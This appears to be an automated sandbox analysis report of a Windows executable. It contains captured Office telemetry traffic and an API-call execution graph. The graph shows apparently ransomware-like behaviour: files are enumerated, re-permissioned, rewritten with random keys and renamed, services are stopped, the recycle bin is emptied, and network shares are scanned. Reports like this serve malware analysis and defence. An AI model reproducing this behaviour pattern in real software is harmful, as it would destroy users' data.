                                2024-12-03 16:52:20 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:20 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE0A2434F"
                                x-ms-request-id: f58ffe41-a01e-00ab-56b5-429106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165220Z-174f7845968n2hr8hC1EWR9cag00000015v000000000dxv0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                144 | 192.168.2.5 | 50112 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:20 UTC | 192 | OUT | GET /rules/rule703451v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:20 GMT
                                Content-Type: text/xml
                                Content-Length: 1409
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BDFC438CF"
                                x-ms-request-id: 3f20e104-d01e-005a-1934-417fd9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165220Z-174f7845968px8v7hC1EWR08ng00000016dg00000000m8nn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC | 1409 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                145 | 192.168.2.5 | 50113 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:21 UTC | 192 | OUT | GET /rules/rule703450v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1372
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE6669CA7"
                                x-ms-request-id: 8189778e-c01e-007a-5562-43b877000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968swgbqhC1EWRmnb4000000169000000000r8x9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC | 1372 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                146 | 192.168.2.5 | 50114 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:21 UTC | 192 | OUT | GET /rules/rule700901v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1408
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE1038EF2"
                                x-ms-request-id: c598b7d5-d01e-0014-1559-43ed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968vqt9xhC1EWRgten000000167000000000kxb4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC | 1408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                147 | 192.168.2.5 | 50115 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:21 UTC | 192 | OUT | GET /rules/rule700900v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1371
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                ETag: "0x8DC582BED3D048D"
                                x-ms-request-id: f55f5888-f01e-0000-046a-40193e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968ljs8phC1EWRe6en000000162000000000d15u
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC | 1371 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                148 | 192.168.2.5 | 50116 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:22 UTC | 192 | OUT | GET /rules/rule702251v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1389
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE0F427E7"
                                x-ms-request-id: 68ec8e83-c01e-002b-3fee-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968swgbqhC1EWRmnb4000000169g00000000pet1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                149 | 192.168.2.5 | 50117 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:52:22 UTC | 192 | OUT | GET /rules/rule702250v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:23 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1352
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                ETag: "0x8DC582BDD0A87E5"
                                x-ms-request-id: ab01a2f3-c01e-0079-17e9-41e51a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f78459685m244hC1EWRgp2c000000161g00000000cwz9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:23 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                Target ID:0
                                Start time:11:50:45
                                Start date:03/12/2024
                                Path:C:\Users\user\Desktop\win_gui.exe.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\win_gui.exe.exe"
                                Imagebase:0x5c0000
                                File size:1'753'088 bytes
                                MD5 hash:63E4D0E113333B0BD2AF6ADB9F06C639
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                  Execution Graph

                                  Execution Coverage:4.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:53.9%
                                  Total number of Nodes:1111
                                  Total number of Limit Nodes:42
71965 5c7277 10 API calls 71972 5c8146 71965->71972 71966 5c856f Sleep 71966->71972 71968 5c85dc 72025 5c5cd2 RtlFreeHeap 71968->72025 71970 5c81cb InterlockedIncrement 71970->71972 71971 5c73f4 EnterCriticalSection LeaveCriticalSection 71971->71972 71972->71964 71972->71965 71972->71966 71972->71968 71972->71970 71972->71971 71973 5c9fa1 3 API calls 71972->71973 71974 5c8253 FindFirstFileW 71972->71974 71976 5c851e FindClose 71972->71976 71977 5c850a FindNextFileW 71972->71977 71979 5c82cb lstrcmpW 71972->71979 71980 5c853d Sleep 71972->71980 71981 5c8431 lstrcmpW 71972->71981 71983 5c10f6 lstrcmpiW 71972->71983 71984 5c834a lstrcmpW 71972->71984 71985 5c7183 5 API calls 71972->71985 71986 5c84f0 Sleep 71972->71986 72019 5c7234 EnterCriticalSection 71972->72019 72024 5c5cd2 RtlFreeHeap 71972->72024 71973->71972 71974->71972 71976->71972 71977->71972 71977->71976 71978 5c8530 InterlockedDecrement 71978->71972 71979->71972 71980->71972 71981->71972 71982 5c8453 lstrcmpW 71981->71982 71982->71972 71983->71972 71984->71972 71985->71972 71986->71972 72027 5c5c2d RtlAllocateHeap 71987->72027 71989 5c7e4e 71990 5c811c 71989->71990 72028 5c5c2d RtlAllocateHeap 71989->72028 72098 5c1a1a RtlFreeHeap 71990->72098 71993 5c7e63 71993->71990 72029 5c5c2d RtlAllocateHeap 71993->72029 71994 5c8126 71996 5c8076 Sleep 71998 5c7e78 71996->71998 71997 5c7234 3 API calls 71997->71998 71998->71990 71998->71996 71998->71997 71999 5c80bb Sleep 71998->71999 72000 5c7eaf InterlockedIncrement 71998->72000 72002 5c73f4 EnterCriticalSection LeaveCriticalSection 71998->72002 72003 5c7277 10 API calls 71998->72003 72008 5c8059 Sleep 71998->72008 71999->71998 72030 5c1a4d GetFileAttributesW 72000->72030 72002->71998 72003->71998 72005 5c7f26 EnterCriticalSection 72014 5c7ec9 72005->72014 72006 5c804c InterlockedDecrement 72006->71998 72008->71998 72009 5c7f8a LeaveCriticalSection 72009->72014 72011 5c7fb8 EnterCriticalSection PostMessageW PostMessageW LeaveCriticalSection 72011->72014 72012 
5c800e 72013 5c803a Sleep 72012->72013 72015 5c8017 EnterCriticalSection PostMessageW LeaveCriticalSection 72012->72015 72092 5c9f0e 72013->72092 72014->72005 72014->72009 72014->72011 72014->72012 72014->72013 72090 5d1b3f IsWindowVisible 72014->72090 72091 5c5cd2 RtlFreeHeap 72014->72091 72097 5c5cd2 RtlFreeHeap 72014->72097 72015->72013 72018->71972 72020 5c726b LeaveCriticalSection 72019->72020 72021 5c7248 72019->72021 72020->71972 72026 5c5cd2 RtlFreeHeap 72021->72026 72023 5c726a 72023->72020 72024->71978 72025->71964 72026->72023 72027->71989 72028->71993 72029->71998 72031 5c1a8f 72030->72031 72032 5c1ab0 CreateFileW GetLastError 72030->72032 72031->72032 72035 5c1a93 SetFileAttributesW 72031->72035 72033 5c1b14 GetFileSizeEx 72032->72033 72034 5c1ad5 72032->72034 72050 5c1b36 72033->72050 72073 5c1b2a 72033->72073 72037 5c7054 8 API calls 72034->72037 72049 5c1b0c 72034->72049 72035->72032 72036 5c1aa1 72035->72036 72099 5c7054 72036->72099 72040 5c1ae6 72037->72040 72109 5ca48c 72040->72109 72042 5c1aed CreateFileW 72042->72033 72042->72049 72043 5c21d9 CloseHandle 72044 5c21e0 72043->72044 72045 5c21fc lstrcmpW 72044->72045 72046 5c2220 lstrcpyW 72044->72046 72044->72049 72045->72046 72047 5c220a MoveFileW 72045->72047 72052 5c2234 72046->72052 72048 5c221c 72047->72048 72047->72049 72048->72046 72049->72014 72051 5c1ba5 ReadFile 72050->72051 72054 5c1bc2 72050->72054 72051->72054 72052->72049 72053 5c29fe lstrcatW 72052->72053 72055 5c9f53 2 API calls 72053->72055 72057 5c1bde SetFilePointerEx ReadFile ReadFile ReadFile 72054->72057 72059 5c1c41 SetFilePointerEx SetFilePointerEx ReadFile 72054->72059 72058 5c2a1b 72055->72058 72057->72059 72058->72049 72060 5c9fa1 3 API calls 72058->72060 72061 5c1d16 72059->72061 72060->72049 72062 5c7c96 CryptGenRandom 72061->72062 72064 5c1d71 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72062->72064 72063 5c1ee9 WideCharToMultiByte WideCharToMultiByte 72067 5c1f43 72063->72067 72064->72063 72065 5c223d 
SetFilePointerEx 72069 5c227b 72065->72069 72074 5c2283 72065->72074 72067->72065 72068 5c1f7b 72067->72068 72120 5c5c2d RtlAllocateHeap 72068->72120 72069->72073 72069->72074 72071 5c2293 ReadFile 72072 5c2199 72071->72072 72071->72074 72072->72073 72075 5c234b lstrcpyW lstrcatW 72072->72075 72073->72043 72073->72044 72074->72071 72074->72072 72078 5c22c8 SetFilePointerEx WriteFile 72074->72078 72077 5c2375 72075->72077 72076 5c1fa5 72121 5c5cd2 RtlFreeHeap 72076->72121 72081 5c23c7 12 API calls 72077->72081 72082 5c2993 SetFilePointerEx WriteFile 72077->72082 72078->72072 72079 5c230f SetFilePointerEx 72078->72079 72079->72071 72079->72074 72083 5c281c 10 API calls 72081->72083 72084 5c2806 72081->72084 72082->72073 72085 5c2967 72083->72085 72084->72083 72085->72085 72086 5c297d lstrcatW 72085->72086 72086->72073 72087 5c1f8b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72087->72073 72087->72076 72088 5c20c1 SetFilePointerEx ReadFile 72087->72088 72089 5c2103 SetFilePointerEx WriteFile 72087->72089 72088->72087 72089->72087 72090->72014 72091->72014 72093 5c9f3d PeekMessageW 72092->72093 72094 5c8043 72093->72094 72095 5c9f23 72093->72095 72094->72006 72095->72093 72096 5c9f29 TranslateMessage DispatchMessageW 72095->72096 72096->72093 72097->72006 72098->71994 72100 5c706c EnterCriticalSection SetNamedSecurityInfoW GetNamedSecurityInfoW 72099->72100 72101 5c1aa8 SetFileAttributesW 72099->72101 72102 5c70dc 72100->72102 72103 5c70ae SetEntriesInAclW 72100->72103 72101->72032 72105 5c70ed 72102->72105 72106 5c70e8 LocalFree 72102->72106 72103->72102 72104 5c70c6 SetNamedSecurityInfoW 72103->72104 72104->72102 72107 5c70f8 LeaveCriticalSection 72105->72107 72108 5c70f3 LocalFree 72105->72108 72106->72105 72107->72101 72108->72107 72110 5ca4ab 72109->72110 72112 5ca4a4 72109->72112 72110->72112 72122 5c5c2d RtlAllocateHeap 72110->72122 72112->72042 72112->72112 72113 5ca60f 72124 5c5cd2 RtlFreeHeap 72113->72124 72115 5ca5e7 72123 5c5cd2 RtlFreeHeap 72115->72123 
72116 5ca52e 72116->72112 72116->72113 72116->72115 72118 5ca589 CreateToolhelp32Snapshot 72116->72118 72118->72113 72119 5ca59e Module32FirstW CloseHandle StrStrIW 72118->72119 72119->72113 72119->72116 72120->72087 72121->72072 72122->72116 72123->72112 72124->72112 72126 5d1a97 3 API calls 72125->72126 72127 5c860a 72126->72127 72128 5d1a97 3 API calls 72127->72128 72132 5c8614 72128->72132 72129 5c8658 72142 5c5cd2 RtlFreeHeap 72129->72142 72131 5c862e WaitForSingleObject CloseHandle 72131->72132 72132->72129 72132->72131 72133 5c865d 72134 5d1a97 3 API calls 72133->72134 72135 5c866d 72134->72135 72136 5d1a97 3 API calls 72135->72136 72137 5c8677 72136->72137 72138 5d1a97 3 API calls 72137->72138 72139 5c8681 72138->72139 72139->72139 72143 5d1c06 72139->72143 72142->72133 72144 5d1c16 lstrlenW 72143->72144 72151 5c87cc 72143->72151 72154 5c5c2d RtlAllocateHeap 72144->72154 72146 5d1c30 lstrlenW 72155 5c5c2d RtlAllocateHeap 72146->72155 72148 5d1c43 72149 5d1c4d wvsprintfW 72148->72149 72150 5d1c98 72148->72150 72148->72151 72149->72150 72152 5d1c5f lstrcpyW EnterCriticalSection PostMessageW LeaveCriticalSection 72149->72152 72156 5c5cd2 RtlFreeHeap 72150->72156 72151->71804 72152->72150 72152->72151 72154->72146 72155->72148 72156->72151 72159 5c1035 72158->72159 72160 5c1027 72158->72160 72175 5c5c2d RtlAllocateHeap 72159->72175 72161 5c102a lstrlenA 72160->72161 72161->72159 72161->72161 72163 5c104d 72164 5c1055 lstrlenA 72163->72164 72166 5c10a3 72163->72166 72165 5c105e 72164->72165 72165->72166 72168 5c108f lstrlenA 72165->72168 72169 5c1076 MultiByteToWideChar 72165->72169 72176 5c5c2d RtlAllocateHeap 72165->72176 72166->71824 72166->71825 72168->72165 72169->72168 72171 5c1134 72170->72171 72172 5c1109 72170->72172 72171->71830 72172->72171 72173 5c1112 lstrcmpiW 72172->72173 72173->72171 72173->72172 72174->71829 72175->72163 72176->72165 72178 5cb4cd 72177->72178 72179 5cb872 72177->72179 72180 5c1000 6 API calls 72178->72180 72179->71841 72181 
5cb4e4 72180->72181 72182 5cb865 CloseServiceHandle 72181->72182 72183 5cb85a 72181->72183 72185 5cb509 OpenServiceW 72181->72185 72189 5cb82d CloseServiceHandle 72181->72189 72190 5cb55e EnumDependentServicesW 72181->72190 72194 5cb5a3 EnumDependentServicesW 72181->72194 72198 5d1c06 9 API calls 72181->72198 72202 5cb415 ControlService 72181->72202 72207 5c5c2d RtlAllocateHeap 72181->72207 72208 5c5cd2 RtlFreeHeap 72181->72208 72182->72179 72209 5c10b9 RtlFreeHeap 72183->72209 72187 5cb51a GetLastError 72185->72187 72188 5cb525 QueryServiceStatusEx 72185->72188 72186 5cb864 72186->72182 72187->72181 72188->72181 72188->72189 72189->72181 72190->72181 72191 5cb57f GetLastError 72190->72191 72191->72181 72194->72181 72195 5cb5c3 OpenServiceW 72194->72195 72201 5cb5ef 72195->72201 72197 5cb415 4 API calls 72197->72201 72198->72181 72199 5cb721 CloseServiceHandle 72199->72201 72200 5d1c06 9 API calls 72200->72201 72201->72181 72201->72197 72201->72199 72201->72200 72204 5cb433 72202->72204 72206 5cb490 72202->72206 72203 5cb455 Sleep QueryServiceStatusEx 72203->72204 72204->72203 72205 5cb478 GetTickCount 72204->72205 72204->72206 72205->72204 72205->72206 72206->72181 72207->72181 72208->72181 72209->72186 72210->71849 72211->71855 72212->71857 72213->71861 72215 5c5c95 GetVersionExW 72214->72215 72215->71871 72216->71900 72218 5d1b7c lstrlenW 72217->72218 72226 5d1c01 72217->72226 72230 5c5c2d RtlAllocateHeap 72218->72230 72220 5d1b93 lstrlenW 72231 5c5c2d RtlAllocateHeap 72220->72231 72222 5d1ba4 72223 5d1bf6 72222->72223 72224 5d1bef 72222->72224 72225 5d1bae lstrcpyW lstrcpyW EnterCriticalSection PostMessageW LeaveCriticalSection 72222->72225 72223->72226 72233 5c5cd2 RtlFreeHeap 72223->72233 72232 5c5cd2 RtlFreeHeap 72224->72232 72225->72224 72225->72226 72226->71904 72229->71898 72230->72220 72231->72222 72232->72223 72233->72226 72235 5c5cfc WSAIoctl 72234->72235 72237 5c5d48 72234->72237 72236 5c5d3d closesocket 72235->72236 72235->72237 72236->72237 
72237->71914 72237->71915 72239 5c5d7a 72238->72239 72240 5c5f91 72238->72240 72253 5c5c2d RtlAllocateHeap 72239->72253 72240->71914 72240->71927 72242 5c5d7f 72242->72240 72243 5c5d89 GetIpNetTable 72242->72243 72244 5c5f87 72243->72244 72251 5c5d99 72243->72251 72255 5c5cd2 RtlFreeHeap 72244->72255 72246 5c5dbd inet_ntoa WSAGetLastError 72246->72251 72247 5c5e18 StrStrIA 72247->72251 72248 5c5e6b StrStrIA 72248->72251 72249 5c5e9b StrStrIA 72249->72251 72250 5c5ef7 StrStrIA 72250->72251 72251->72244 72251->72246 72251->72247 72251->72248 72251->72249 72251->72250 72254 5c5c2d RtlAllocateHeap 72251->72254 72253->72242 72254->72251 72255->72240 72257 5c6358 ExitThread 72256->72257 72258 5c6360 GetQueuedCompletionStatus 72256->72258 72261 5c6386 72258->72261 72260 5c6399 setsockopt 72260->72261 72263 5c63b8 getsockopt 72260->72263 72261->72258 72261->72260 72262 5c6580 DeleteTimerQueue 72261->72262 72266 5c648f shutdown closesocket 72261->72266 72269 5c6514 72261->72269 72271 5c647a CancelIo 72261->72271 72273 5c64b7 GlobalFree 72261->72273 72275 5c6414 shutdown closesocket 72261->72275 72276 5c643c GlobalFree 72261->72276 72287 5c618d 72261->72287 72299 5c629a 72261->72299 72305 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72261->72305 72263->72261 72265 5c653d 72265->72262 72267 5c653f shutdown closesocket 72265->72267 72274 5c6567 GlobalFree 72265->72274 72266->72261 72267->72265 72269->72262 72269->72265 72272 5c652d CancelIo 72269->72272 72271->72261 72272->72269 72273->72261 72274->72265 72275->72261 72276->72261 72278 5c6073 EnterCriticalSection 72277->72278 72279 5c6098 72278->72279 72280 5c6084 LeaveCriticalSection Sleep 72278->72280 72279->72278 72281 5c60ac LeaveCriticalSection 72279->72281 72308 5c67b6 72279->72308 72327 5c5cd2 RtlFreeHeap 72279->72327 72280->72278 72281->72279 72282 5c60d1 72281->72282 72326 5c5cd2 RtlFreeHeap 72282->72326 72285 5c60d8 ExitThread 72288 5c619e 72287->72288 72298 5c61a5 
72287->72298 72288->72261 72289 5c61ae GlobalAlloc 72290 5c626f 72289->72290 72291 5c61c5 WSASocketW 72289->72291 72306 5c5cd2 RtlFreeHeap 72290->72306 72292 5c61ea GlobalFree 72291->72292 72293 5c61f3 bind 72291->72293 72292->72298 72296 5c6225 closesocket 72293->72296 72297 5c6230 CreateIoCompletionPort 72293->72297 72296->72292 72297->72296 72297->72298 72298->72289 72298->72290 72300 5c62ab 72299->72300 72304 5c631d CreateTimerQueueTimer 72299->72304 72301 5c62bc htons 72300->72301 72302 5c62ff WSAGetLastError 72300->72302 72300->72304 72307 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72300->72307 72301->72300 72302->72300 72304->72257 72304->72261 72305->72261 72306->72288 72307->72300 72309 5c67d7 EnterCriticalSection NetShareEnum LeaveCriticalSection 72308->72309 72310 5c6806 72309->72310 72324 5c6813 72309->72324 72310->72309 72311 5c680e 72310->72311 72311->72279 72312 5c6a3e NetApiBufferFree 72312->72311 72313 5c6883 lstrcmpiW 72313->72324 72314 5c6a3b 72314->72312 72316 5c68ab lstrcpyW 72316->72324 72317 5c68ee StrCmpNW 72318 5c6963 lstrcatW 72317->72318 72317->72324 72319 5c6995 72318->72319 72319->72319 72321 5c69aa lstrcatW lstrcatW 72319->72321 72320 5c6954 lstrcatW 72320->72318 72322 5c7183 5 API calls 72321->72322 72322->72324 72324->72312 72324->72313 72324->72314 72324->72316 72324->72317 72324->72320 72325 5d1b5f 9 API calls 72324->72325 72328 5c5c2d RtlAllocateHeap 72324->72328 72329 5c5cd2 RtlFreeHeap 72324->72329 72325->72324 72326->72285 72327->72279 72328->72324 72329->72324 72331 5c6748 72330->72331 72332 5c6737 WaitForSingleObject CloseHandle 72330->72332 72333 5c676f 72331->72333 72334 5c6751 72331->72334 72332->72331 72336 5c6778 DeleteCriticalSection CloseHandle 72333->72336 72337 5c678b 72333->72337 72341 5c60e1 RtlAllocateHeap RtlFreeHeap WSAAddressToStringW EnterCriticalSection LeaveCriticalSection 72334->72341 72336->72337 72339 5d1a97 3 API calls 72337->72339 72338 5c6759 
WaitForSingleObject CloseHandle 72338->72333 72340 5c67aa 72339->72340 72340->71933 72341->72338 72343 5d2025 72344 5d2031 ___scrt_is_nonwritable_in_current_image 72343->72344 72375 5d2221 72344->72375 72346 5d2038 72347 5d218b 72346->72347 72350 5d2062 72346->72350 72503 5d2521 4 API calls 2 library calls 72347->72503 72349 5d2192 72504 668f94 28 API calls _abort 72349->72504 72361 5d20a1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 72350->72361 72500 668cb9 5 API calls _ValidateLocalCookies 72350->72500 72352 5d2198 72505 668f46 28 API calls _abort 72352->72505 72355 5d207b 72357 5d2081 72355->72357 72501 668c5d 5 API calls _ValidateLocalCookies 72355->72501 72356 5d21a0 72359 5d2102 72386 5d263c 72359->72386 72361->72359 72502 668f5c 38 API calls 2 library calls 72361->72502 72376 5d222a 72375->72376 72506 5d27e4 IsProcessorFeaturePresent 72376->72506 72378 5d2236 72507 66718e 10 API calls 2 library calls 72378->72507 72380 5d223b 72381 5d223f 72380->72381 72508 6697c4 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 72380->72508 72381->72346 72383 5d2248 72384 5d2256 72383->72384 72509 6671ad 7 API calls 2 library calls 72383->72509 72384->72346 72510 6672e0 72386->72510 72388 5d264f GetStartupInfoW 72389 5d2108 72388->72389 72390 668c0a 72389->72390 72511 675b17 72390->72511 72392 5d2110 72395 5c55df GetProcessHeap 72392->72395 72394 668c13 72394->72392 72515 675e21 38 API calls 72394->72515 72517 5cabd1 GetLocaleInfoW 72395->72517 72401 5c5608 MultiByteToWideChar 72402 5c5635 72401->72402 72539 5c7413 72402->72539 72404 5c563f 72549 5c6cb5 72404->72549 72410 5c5657 72588 5c87dd 72410->72588 72412 5c5660 WSAStartup GetComputerNameW InitializeCriticalSection 72613 5cecd9 72412->72613 72414 5c56ac 72414->72414 72415 5d1c06 9 API calls 72414->72415 72416 5c582b 72415->72416 72693 5ca7db GetCommandLineW lstrlenW 72416->72693 72420 5c58da 72422 5c590e 72420->72422 72425 5c59cf 
72420->72425 72731 5c73f4 EnterCriticalSection LeaveCriticalSection 72420->72731 72421 5c585b 72421->72420 72428 5c58ba CreateMutexA WaitForSingleObject 72421->72428 72422->72425 72427 5c593b 72422->72427 72733 5c73f4 EnterCriticalSection LeaveCriticalSection 72422->72733 72424 5c58fe 72424->72422 72429 5c5902 72424->72429 72426 5c59e1 72425->72426 72735 5c73f4 EnterCriticalSection LeaveCriticalSection 72425->72735 72431 5c5a92 72426->72431 72439 5c5b65 72426->72439 72715 5caf2d 72426->72715 72427->72425 72710 5c73f4 EnterCriticalSection LeaveCriticalSection 72427->72710 72428->72420 72433 5c58d3 ExitProcess 72428->72433 72732 5c9585 21 API calls __vfprintf_l 72429->72732 72434 5c8c94 130 API calls 72431->72434 72437 5c5a97 72434->72437 72436 5c592b 72436->72427 72438 5c592f 72436->72438 72441 5c8d5c 15 API calls 72437->72441 72734 5c9abb 12 API calls 72438->72734 72440 5c5b72 72439->72440 72737 5d1b3f IsWindowVisible 72439->72737 72445 5c5ba8 GetMessageW 72440->72445 72451 5c5bb9 72440->72451 72457 5c5a9e 72441->72457 72442 5c5950 72442->72425 72446 5c5961 72442->72446 72711 5cc338 SHEmptyRecycleBinW 72442->72711 72450 5c5b8c TranslateMessage DispatchMessageW 72445->72450 72445->72451 72452 5c5980 72446->72452 72455 5c9ebc GetVersionExW 72446->72455 72450->72445 72738 5c7172 RtlFreeHeap EnterCriticalSection LeaveCriticalSection DeleteCriticalSection 72451->72738 72453 5c599d 72452->72453 72456 5cb21b 22 API calls 72452->72456 72458 5c59aa 72453->72458 72462 5cb8a2 17 API calls 72453->72462 72460 5c596e 72455->72460 72461 5c598d 72456->72461 72464 5c5ac0 72457->72464 72468 5c9f0e 3 API calls 72457->72468 